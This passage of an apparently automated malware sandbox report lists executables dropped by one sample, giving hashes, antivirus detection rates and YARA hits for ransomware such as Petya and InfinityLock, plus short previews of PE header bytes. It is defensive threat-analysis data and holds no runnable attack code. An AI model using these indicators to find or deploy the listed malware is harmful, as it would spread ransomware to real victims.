                                                                                                                                                            • Rule: JoeSecurity_infinitylock, Description: Yara detected InfinityLock Ransomware, Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe, Author: Joe Security
                                                                                                                                                            • Rule: MALWARE_Win_InfinityLock, Description: Detects InfinityLock ransomware, Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe, Author: ditekSHen
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 85%
                                                                                                                                                            • Antivirus: Metadefender, Detection: 60%, Browse
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...sWAY.....................d......^.... ... ....@.. ....................................`.....................................W....@..._........................... ............................................... ............... ..H............text...d.... ...................... ..`.sdata..8.... ......................@....rsrc...._...@...`..................@..@.reloc...............J..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):6438912
                                                                                                                                                            Entropy (8bit):6.6234173300696355
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:98304:hvOOFJ+Z8eAgy7SH9s76RSvyqJOBgECfMfYv+85JH0DVczt8A:hvOOFJ+ggr9s76R+wcMAv+IHCczt8
                                                                                                                                                            MD5:04155ED507699B4E37532E8371192C0B
                                                                                                                                                            SHA1:A14107131237DBB0DF750E74281C462A2EA61016
                                                                                                                                                            SHA-256:B6371644B93B9D3B9B32B2F13F8265F9C23DDECC1E9C5A0291BBF98AA0FC3B77
                                                                                                                                                            SHA-512:6DE59EBBC9B96C8A19D530CAA13AA8129531EBD14B3B6C6BBB758426B59ED5AB12483BFA232D853AF2E661021231B4B3FCC6C53E187EEBA38FA523F673115371
                                                                                                                                                            Malicious:true
                                                                                                                                                            Yara Hits:
                                                                                                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\Desktop\Endermanch@InternetSecurityGuard.exe, Author: Joe Security
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 85%
                                                                                                                                                            • Antivirus: Metadefender, Detection: 64%, Browse
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................^&...;.....tp&.......&..............................@b..................@............................'..N...0*...8...................'.T8............................'.....................D.'..............................text....8&......8&................. ..`.itext..."...P&.."...P&............. ..`.data........&......&.............@....bss.....`....'..`....'..................idata...N....'..N....'.............@....tls....L.....'.L.....'..................rdata........'.......'.............@..@.reloc..T8....'.T8....'.............@..B.rsrc.....8..0*...8..0*.............@..@.............0a......v`.............@..@................................................................................................
                                                                                                                                                            Process:C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):54569
                                                                                                                                                            Entropy (8bit):6.640114556707396
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:768:4yKoNLsn4Jp9ZvRInygrpMoZN+WtOl08jxBEHCDwBLpZTPCUvQK:j/sn4/OycxZN+MKxp8t9zQK
                                                                                                                                                            MD5:87CCD6F4EC0E6B706D65550F90B0E3C7
                                                                                                                                                            SHA1:213E6624BFF6064C016B9CDC15D5365823C01F5F
                                                                                                                                                            SHA-256:E79F164CCC75A5D5C032B4C5A96D6AD7604FAFFB28AFE77BC29B9173FA3543E4
                                                                                                                                                            SHA-512:A72403D462E2E2E181DBDABFCC02889F001387943571391BEFED491AAECBA830B0869BDD4D82BCA137BD4061BBBFB692871B1B4622C4A7D9F16792C60999C990
                                                                                                                                                            Malicious:true
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 96%
                                                                                                                                                            • Antivirus: Metadefender, Detection: 86%, Browse
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g.{.#q..#q..#q..@S?.!q...n...q...UU."q...UP."q..Rich#q..........................PE..L...X\q@.................L...........7.......`....@..................................:......................................db..........pG...........................................................................`..d............................text...(K.......L.................. ..`.rdata..|....`.......P..............@..@.data....3...p.......`..............@....rsrc...pG.......H...n..............@...................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1182593
                                                                                                                                                            Entropy (8bit):7.772772849171323
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24576:pXhZgPlmWcA4Te9+g6+lET/+xRXKRwFSmjTGIWrwg:xInpSe99pCkRXKRMdGIWrN
                                                                                                                                                            MD5:2EB3CE80B26345BD139F7378330B19C1
                                                                                                                                                            SHA1:10122BD8DD749E20C132D108D176794F140242B0
                                                                                                                                                            SHA-256:8ABED3EA04D52C42BDD6C9169C59212A7D8C649C12006B8278EDA5AA91154CD2
                                                                                                                                                            SHA-512:E3223CD07D59CD97893304A3632B3A66FD91635848160C33011C103CCA2BADBFE9B78FE258666B634E455872F3A98889EDE5A425D8FAE91CAE6983DA1EA1190A
                                                                                                                                                            Malicious:true
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 59%
                                                                                                                                                            • Antivirus: Metadefender, Detection: 24%, Browse
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........~............b......b..<....b.....)^......................................... ...... ......%...... ......Rich............PE..L...~.r\.....................>......y.............@..........................p............@............................4.......<.......$s...................P.......n..T...........................(...@...............\...T... ....................text...d........................... ..`.rdata..............................@..@.data...............................@....gfids..............................@..@.rsrc...$s.......t..................@..@.reloc.......P... ..................@..B................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):424448
                                                                                                                                                            Entropy (8bit):7.802970757279057
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6144:BCoFAtv2DDWANPG4F0vwDsl6JEFiGUHzAB4lTa7tKzWNYRbvhLWxsqgyn:koOv2D60PLyvaJTT9Za7kziYD69g
                                                                                                                                                            MD5:D0DEB2644C9435EA701E88537787EA6E
                                                                                                                                                            SHA1:866E47ECD80DA89C4F56557659027A3AEE897132
                                                                                                                                                            SHA-256:AD6CD46F373AADAD85FAB5ECDB4CB4AD7EBD0CBE44C84DB5D2A2EE1B54EB5EC3
                                                                                                                                                            SHA-512:6FAAC2E1003290BB3A0613EE84D5C76D3C48A4524E97975E9174D6FCFB5A6A48D6648B06ED5A4C10C3349F70EFFFC6A08A185FDEB0824250AE044B96EF39FCDF
                                                                                                                                                            Malicious:true
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 95%
                                                                                                                                                            • Antivirus: Metadefender, Detection: 80%, Browse
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......y...=.R=.R=.R...R6.R=.R+.R..R<.R...R<.R..R<.RRich=.R........PE..L.....7O...................._....................................................................@..........................l...x.......................................................................................l............................text...h........................... ..`.rdata..............................@..@.data...<...........................@....tls................................@....rsrc...............................@..@.sdata...............p..............@....wdata...............r..............@....rdata...............t..............@....fdata...............v..............@....mdata...............x..............@...........................................................................................................................................................
                                                                                                                                                            Process:C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):10148025
                                                                                                                                                            Entropy (8bit):7.9801835318970475
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:196608:CtbTP1ErBwMQjd1YTHdmpCP2PVgP/acIE/xQ0zyZejVk+YzbRdTZ:C1E1+dYx6OP9hdyZwV4zd
                                                                                                                                                            MD5:1F13396FA59D38EBE76CCC587CCB11BB
                                                                                                                                                            SHA1:867ADB3076C0D335B9BFA64594EF37A7E2C951FF
                                                                                                                                                            SHA-256:83ECB875F87150A88F4C3D496EB3CB5388CD8BAFDFF4879884ECECDBD1896E1D
                                                                                                                                                            SHA-512:82CA2C781BDAA6980F365D1EEDB0AF5AC5A80842F6EDC28A23A5B9EA7B6FEEC5CD37D54BD08D9281C9CA534ED0047E1E234873B06C7D2B6FE23A7B88A4394FDC
                                                                                                                                                            Malicious:true
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 51%
                                                                                                                                                            • Antivirus: Metadefender, Detection: 20%, Browse
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................F..........hT.......`....@.................................1............@..................................................................................................................................................CODE.....D.......F.................. ..`DATA.....(...`...*...J..............@...BSS..................t...................idata...............t..............@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc...............................@..P............. ......................@..P........................................................................................................................................
                                                                                                                                                            Process:C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1427968
                                                                                                                                                            Entropy (8bit):6.856188310924527
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12288:WZgSKWk54jeg6lL5assQHtzV2KoLJ+PwXxwuLSJ8slf1zMr6iL/KNDx2PIXe2Q:KgoLetlLS8tz6V+PwD0XVMrXCNDxtK
                                                                                                                                                            MD5:63210F8F1DDE6C40A7F3643CCF0FF313
                                                                                                                                                            SHA1:57EDD72391D710D71BEAD504D44389D0462CCEC9
                                                                                                                                                            SHA-256:2AAB13D49B60001DE3AA47FB8F7251A973FAA7F3C53A3840CDF5FD0B26E9A09F
                                                                                                                                                            SHA-512:87A89E8AB85BE150A783A9F8D41797CFA12F86FDCCB48F2180C0498BFD2B1040B730DEE4665FE2C83B98D436453680226051B7F1532E1C0E0CDA0CF702E80A11
                                                                                                                                                            Malicious:true
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 91%
                                                                                                                                                            • Antivirus: Metadefender, Detection: 72%, Browse
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......V..=...n...n...n5g.n...n...n...n..6n...n...n...n..!n...n..$n...nRich...n................PE..L...c@)Y.................P...v...... ........`....@..................................................................................`...............................................................................`...............................text....N.......P.................. ..`.rdata..|....`.......T..............@..@.data........P.......6..............@....rsrc....|...`.......<..............@..@........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, RAR self-extracting archive
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):899582
                                                                                                                                                            Entropy (8bit):7.955977131352216
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24576:bUWqistOB98g0Z1hPLX2jOmsQl3eW0a92Vdcvd7wR:bUUZ98g0FPLIRl3sa92Hcvd8R
                                                                                                                                                            MD5:E4D4A59494265949993E26DEE7B077D1
                                                                                                                                                            SHA1:83E3D0C7E544117D6054E7D55932A7D2DBAF1163
                                                                                                                                                            SHA-256:5AE57D8750822C203F5BF5E241C7132377B250DF36A215DFF2F396C8440B82DD
                                                                                                                                                            SHA-512:EFD176555415E0771A22A6CA6F15A82AEC14CA090D2599959612DB9D8E07065E38A7B82E2BF7BE67CBE1494733344879782F5516BB502E0177E7B540C96FA718
                                                                                                                                                            Malicious:true
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 70%
                                                                                                                                                            • Antivirus: Metadefender, Detection: 28%, Browse
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......}...9.o.9.o.9.o..a..1.o..a..*.o.9.n...o.'...<.o.0..8.o.0....o.0...8.o.'...8.o.0...8.o.Rich9.o.........PE..L.....J.....................X.............. ....@..........................P......7...............................P7..3....(...........:..........................."............................................... ...............................text...|........................... ..`.rdata....... ......................@..@.data........@.......$..............@....CRT.................&..............@..@.rsrc....:.......<...(..............@..@................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, MSI Installer, Create Time/Date: Mon Jun 21 08:00:00 1999, Name of Creating Application: Windows Installer, Security: 1, Code page: 1252, Template: Intel;1033, Number of Pages: 200, Revision Number: {E3A8E397-19CD-45D5-9611-44A2EB0D7861}, Title: PC Defender, Author: Def Group, Number of Words: 2, Last Saved Time/Date: Mon Sep 6 19:10:34 2010, Last Printed: Mon Sep 6 19:10:34 2010
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):881152
                                                                                                                                                            Entropy (8bit):7.905751034096731
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24576:TkRBL2LYcyvue73Ze+RrM31N0vhMN0T4+ZI:TkRBLgiue73Ze+SWI+Z
                                                                                                                                                            MD5:B3DCE5C3F95A18FD076FAD0F73BB9E39
                                                                                                                                                            SHA1:E80CC285A77302EE221F47E4E94823D4B2EBA368
                                                                                                                                                            SHA-256:DF2E3B2222DCDBB5E0DBDD1200EC8FD5F67FCBEA99E0023DF54307EAB60030FF
                                                                                                                                                            SHA-512:C184436055CF74884AD0D2BD5CA00BCD5A62D6BE46253FE8C71B4DAAA5C710B9DF34AF1B6E41F6D1AF94BCDEC0D33679A6A1B34BF9755678B4E177F368C11D4C
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:......................>...................................8...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................Z................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...^...b...:...;...<...=...>...?...@...A...B...C...D...Y...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X.......`...[...\...]...s..._...t...a...c...{...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...x...v...u...w...~...y...|...z...
                                                                                                                                                            Process:C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):230912
                                                                                                                                                            Entropy (8bit):6.8803725877131
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6144:DCyjXhd1mialK+qoNr8PxtZE6x5v+k6f:rjXhd8ZlKOrMZE6x5b6f
                                                                                                                                                            MD5:AF2379CC4D607A45AC44D62135FB7015
                                                                                                                                                            SHA1:39B6D40906C7F7F080E6BEFA93324DDDADCBD9FA
                                                                                                                                                            SHA-256:26B4699A7B9EEB16E76305D843D4AB05E94D43F3201436927E13B3EBAFA90739
                                                                                                                                                            SHA-512:69899C47D0B15F92980F79517384E83373242E045CA696C6E8F930FF6454219BF609E0D84C2F91D25DFD5EF3C28C9E099C4A3A918206E957BE806A1C2E0D3E99
                                                                                                                                                            Malicious:true
                                                                                                                                                            Yara Hits:
                                                                                                                                                            • Rule: Petya_Ransomware, Description: Detects Petya Ransomware, Source: C:\Users\user\Desktop\Endermanch@Petya.A.exe, Author: Florian Roth
                                                                                                                                                            • Rule: Ransom_Petya, Description: Regla para detectar Ransom.Petya con md5 AF2379CC4D607A45AC44D62135FB7015, Source: C:\Users\user\Desktop\Endermanch@Petya.A.exe, Author: CCN-CERT
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 100%
                                                                                                                                                            • Antivirus: Metadefender, Detection: 84%, Browse
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........\..}\..}\..}Q..}...}Q.!}B..}Q..}...}...}^..}..0}X..}..5}}..}\..}...}y..}9..}Q.%}]..}y. }]..}Rich\..}................PE..L......V.................p...B......oq............@.................................E\.......................................*...................................#......8...............................@............................................text...5o.......p.................. ..`.rdata...............t..............@..@.data...@I...P.......6..............@....rsrc................P..............@..@.reloc...#.......$...b..............@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):225280
                                                                                                                                                            Entropy (8bit):7.663735783294972
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3072:EJv/3Ppzq+M4Lh5VWK5qlYRV+hvuFiweXXbGgL90v5mq33Z3:8hzEA5GlYMWFBeXvx0c+3
                                                                                                                                                            MD5:3ED3FB296A477156BC51ABA43D825FC0
                                                                                                                                                            SHA1:9CAA5C658B1A88FEE149893D3A00B34A8BB8A1A6
                                                                                                                                                            SHA-256:1898F2CAE1E3824CB0F7FD5368171A33ABA179E63501E480B4DA9EA05EBF0423
                                                                                                                                                            SHA-512:DC3D6E409CEE4D54F48D1A25912243D07E2F800578C8E0E348CE515A047ECF5FA3089B46284E0956BBCED345957A000EECDC082E6F3060971759D70A14C1C97E
                                                                                                                                                            Malicious:true
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 95%
                                                                                                                                                            • Antivirus: Metadefender, Detection: 82%, Browse
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......eU!.!4O.!4O.!4O.!4O. 4O.Rich!4O.................PE..L...{....................\...........(.......p....@..................................................................................p..\............................................................................................................text...I[.......\.................. ....rsrc...\....p.......^.............. .............4)...t....I.....px.:.0.57. Jr~L..3.;..FkJ......F.W.`.;..$g..... u.l......7...)..SO.=...*.).!vZmX4....Er...H0....*..........,./$.....@..}D........b.q...k.w...h.P..E..(R.....m..2)+b.......{.\.0......}".?.....6.HJK}..s..K.=L...I.C....#.W....aY...o......bvr.myH%.5.@.{..>...&.h6.#=.[.......N....kD..(....?.t.'z..s..*.p...._YA...T...dI..Ry....H=?..Y.=..+........[.d$..C?eE.....N.(.'.V(....l....9IJ....5.$B..].O.3..AJ.B.5...{]...` T. >......3.L.\...5s.......
                                                                                                                                                            Process:C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1096816
                                                                                                                                                            Entropy (8bit):7.983532463541044
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24576:32eLSKYFDvuca/8b/gvKyLNWg8daBqqxAWvEZon2USxZr:32yQF7uz/IyL8gJqKvUc2UM9
                                                                                                                                                            MD5:0002DDDBA512E20C3F82AAAB8BAD8B4D
                                                                                                                                                            SHA1:493286B108822BA636CC0E53B8259E4F06ECF900
                                                                                                                                                            SHA-256:2D68FE191BA9E97F57F07F7BD116E53800B983D267DA99BF0A6E6624DD7E5CF7
                                                                                                                                                            SHA-512:497954400AB463EB254ABE895648C208A1CC951ECB231202362DADBE3FFB49D8D853B487589CE935C1DC8171F56D0DF95093FFC655C684FAA944C13BCFD87B8B
                                                                                                                                                            Malicious:true
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 35%
                                                                                                                                                            • Antivirus: Metadefender, Detection: 20%, Browse
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................D....................@..........................P...................@..............................P.......$2..........................................................................................................CODE....@........................... ..`DATA....H...........................@...BSS.....4................................idata..P...........................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc...$2.......4..................@..P.............@......................@..P........................................................................................................................................
                                                                                                                                                            Process:C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):2520576
                                                                                                                                                            Entropy (8bit):7.746940560683332
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24576:CEwbO4PqokXfEP5lJSHlxfGe9pkDda1ei/o+HapablRA9h9nNf3cfxRt5Q469DTd:amokPClGZ9MWwL73KzTaTn6nX2gEeFvE
                                                                                                                                                            MD5:02F471D1FEFBDC07AF5555DBFD6EA918
                                                                                                                                                            SHA1:2A8F93DD21628933DE8BEA4A9ABC00DBB215DF0B
                                                                                                                                                            SHA-256:36619636D511FD4B77D3C1052067F5F2A514F7F31DFAA6B2E5677FBB61FD8CBA
                                                                                                                                                            SHA-512:287B57B5D318764B2E92EC387099E7E313BA404B73DB64D21102BA8656636ABBF52BB345328FE58084DC70414C9E2D8CD46ABD5A463C6D771D9C3BA68759A559
                                                                                                                                                            Malicious:true
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 93%
                                                                                                                                                            • Antivirus: Metadefender, Detection: 64%, Browse
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q...5..Q5..Q5..Q<.-Q4..Q<.;Q4..Q5..Q}..Q...Q<..Q<.2Q1..Q<.*Q4..Q+.,Q4..Q<.)Q4..QRich5..Q........PE..L....#,G.................$...r&...h...i...i..0i...@...................................'..........@...................;i......1i......pi.T&&...i. ...........................................P@i......................0i..............................code.....h..............................text....*....i..,..................@....rdata.......0i......0..............@....tls.........Pi......H..............@....CRT.........`i......J..............@..@.rsrc...T&&..pi..(&..L..............@..@.reloc...............t&.............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):926208
                                                                                                                                                            Entropy (8bit):7.962685597000549
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24576:bnQv6Dyxn2Qx0KHizHWKxHuyCcZFyXR1tG:2OE2QtCzhh/7R
                                                                                                                                                            MD5:0315C3149C7DC1D865DC5A89043D870D
                                                                                                                                                            SHA1:F74546DDA99891CA688416B1A61C9637B3794108
                                                                                                                                                            SHA-256:90C2C3944FA8933EEFC699CF590ED836086DEB31EE56EC71B5651FD978A352C9
                                                                                                                                                            SHA-512:7168DC244F0E400FA302801078E3FAEC8CDD2D3CB3B8BAAAB0A1B3C0929D7CF41E54BFBE530AD5CE96A6B63761F7866D26AAAE788C3138C34294174091478112
                                                                                                                                                            Malicious:true
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 88%
                                                                                                                                                            • Antivirus: Metadefender, Detection: 80%, Browse
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=.s.y...y...y.......x.....G.x...Richy...........................PE..L...A..K.................L...................`....@.............M.-..........P...............................................X..P....p..0...................................................................0...X.......p............................text...$J.......L.................. ..`.data...@....`......................@....rsrc........p.......P..............@..@..H(...Y..H3......I@......IM...........user32.dll.MSVBVM60.DLL.kernel32.dll.NTDLL.DLL..................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1505280
                                                                                                                                                            Entropy (8bit):7.951929263490591
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24576:yYzpj9/AteBV+n/yETaXh8Nv9Xx5/ttAoRfwAy+/CxCWfxBcMkC9e327kY:djRAK+6Fh8zPvrRISCxt5q3SA
                                                                                                                                                            MD5:E1B69C058131E1593ECCD4FBCDBB72B2
                                                                                                                                                            SHA1:6D319439CAC072547EDD7CF2019855FA25092006
                                                                                                                                                            SHA-256:B61C53F4137C41AA0A5538FC9A746034B3A903CC4B1B3C8B5F3D3118E1E2BD8F
                                                                                                                                                            SHA-512:161A5923DC3A6507CBEE3B547EDCEF4FBFE1DC6A04832C2472B1E635D758D1503A61361C2A83A13A0D8E4607516FDA4AE6462A74DF66B20A7C93174BBCC7129C
                                                                                                                                                            Malicious:true
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 81%
                                                                                                                                                            • Antivirus: Metadefender, Detection: 56%, Browse
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........T..5b..5b..5b......5b..5c..5b..M.5b..M.5b.Rich.5b.................PE..L...P.IM.....................................0....@..........................@............@..................................0..(................................5...................................................0...............................text............................... ..`.rdata..p....0....... ..............@..@.data........@......."..............@....rsrc...............................@..@.reloc...F.......H..................@..B................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1257984
                                                                                                                                                            Entropy (8bit):6.67278609716153
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12288:QH1eYXlVeneL/AuCeGhqzjheKTnHdQSR9wlPlVlbzl+lwlElPS3PomNX:QVZVeneLYcmiN7Q6Md3dMyuI
                                                                                                                                                            MD5:D5E5853F5A2A5A7413F26C625C0E240B
                                                                                                                                                            SHA1:0CED68483E7F3742A963F2507937BB7089DE3FFE
                                                                                                                                                            SHA-256:415DD13C421A27ED96BF81579B112FBAC05862405E9964E24EC8E9D4611D25F3
                                                                                                                                                            SHA-512:49EA9AB92CE5832E702FAC6F56A7F7168F60D8271419460ED27970C4A0400E996C2EA097636FC145E355C4DF5CFBF200B7BF3C691133F72E4CAD228F570B91E4
                                                                                                                                                            Malicious:true
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 64%
                                                                                                                                                            • Antivirus: Metadefender, Detection: 56%, Browse
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......0O{>t..mt..mt..my|.mU..m2..ms..my|.m...my|.m...m}V.m}..m}V.ma..mt..m...m.W.mi..my|.mu..mt..mu..m.W.mu..mRicht..m................PE..L...$_.U.................~..........ju............@.......................................@.............................................X...........................................................Pd..@............................................text....}.......~.................. ..`.rdata...d.......f..................@..@.data...l........L..................@....rsrc...X............4..............@..@.reloc...K...`...L..................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):2330112
                                                                                                                                                            Entropy (8bit):7.9751665313341285
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:49152:agXTaxuzs1L1ivBzV+3ZYqjuPOBW0wtuVXgPcOU7m6X+d:aeTaxuo1LYvT+3SiiO8LcZOU7XU
                                                                                                                                                            MD5:7DDE6427DCF06D0C861693B96AD053A0
                                                                                                                                                            SHA1:086008ECFE06AD06F4C0EEE2B13530897146AE01
                                                                                                                                                            SHA-256:077C04EE44667C5E1024652A7BBE7FFF81360EF128245FFD4CD843B7A56227CF
                                                                                                                                                            SHA-512:8CF162F83EBFA2F3DB54B10D5B0E6AF590E97596AC2D469058A98340BF27DE2866E679C777AA46DD530DB44C27503D4CEA8C34D96CB83B71477A806B5AB7C1B9
                                                                                                                                                            Malicious:true
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 81%
                                                                                                                                                            • Antivirus: Metadefender, Detection: 72%, Browse
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................................................................................................................................................................................................................................................................................PE..L.....7M.................`!..................p!...@..........................0D.................. ..........................L.>.......$.......................................................>..............................................................`!......|..................@................p!.....................@................@$......"..............@................P$......$..............@................`$..v...&..............@.................$.....................@...
                                                                                                                                                            Process:C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):448512
                                                                                                                                                            Entropy (8bit):7.686352303150041
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6144:hBGrTx2fgEViq+JoQ9tpecSXFADhKXPEKJRlETLV+PwoVUqwhlKq6yem8lhg:6rLEyptwnX+gXrRlESwKKhlP6yxGh
                                                                                                                                                            MD5:03BAEBA6B4224371CCA7FA6F95AE61C0
